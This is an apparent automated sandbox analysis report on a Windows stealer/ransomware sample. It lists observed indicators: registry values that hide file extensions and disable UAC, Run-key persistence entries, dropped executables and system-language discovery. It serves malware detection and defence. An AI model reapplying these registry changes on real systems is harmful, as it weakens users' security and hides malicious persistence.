Malware Analysis Report

2025-03-15 04:20

Sample ID 241026-ad2hyaxgmm
Target 8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e
SHA256 8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e
Tags
discovery evasion persistence spyware stealer trojan ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

Threat Level: Known bad

The file 8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence spyware stealer trojan ransomware

UAC bypass

Modifies visibility of file extensions in Explorer

Renames multiple (85) files with added filename extension

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Deletes itself

Checks computer location settings

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-26 00:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-26 00:06

Reported

2024-10-26 00:09

Platform

win7-20240903-en

Max time kernel

150s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\hqEcIcQw.exe = "C:\\Users\\Admin\\PuoQwQAo\\hqEcIcQw.exe" C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\hqEcIcQw.exe = "C:\\Users\\Admin\\PuoQwQAo\\hqEcIcQw.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fAMIYEgY.exe = "C:\\ProgramData\\LOAkMAgs\\fAMIYEgY.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fAMIYEgY.exe = "C:\\ProgramData\\LOAkMAgs\\fAMIYEgY.exe" C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
